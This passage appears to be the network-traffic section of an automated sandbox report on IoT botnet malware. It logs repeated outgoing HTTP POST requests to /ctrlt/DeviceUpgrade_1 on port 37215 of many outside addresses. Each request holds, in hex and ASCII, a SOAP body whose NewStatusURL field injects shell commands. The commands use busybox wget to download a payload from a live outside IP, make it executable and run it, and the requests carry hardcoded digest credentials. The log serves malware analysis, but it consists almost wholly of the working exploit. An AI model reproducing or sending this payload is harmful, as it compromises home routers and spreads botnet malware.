                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1647192.168.2.1537232156.154.209.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646317959 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1648192.168.2.155364431.92.79.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646336079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1649192.168.2.155799837.111.229.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646374941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1650192.168.2.1553564156.234.46.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646375895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1651192.168.2.1560060222.116.13.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646406889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1652192.168.2.1537484190.21.154.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646411896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1653192.168.2.1551912181.73.169.3737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.646434069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1654192.168.2.153532045.145.138.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.647608042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1655192.168.2.1546534181.22.214.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.647624969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1656192.168.2.1554964190.33.3.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.647665977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
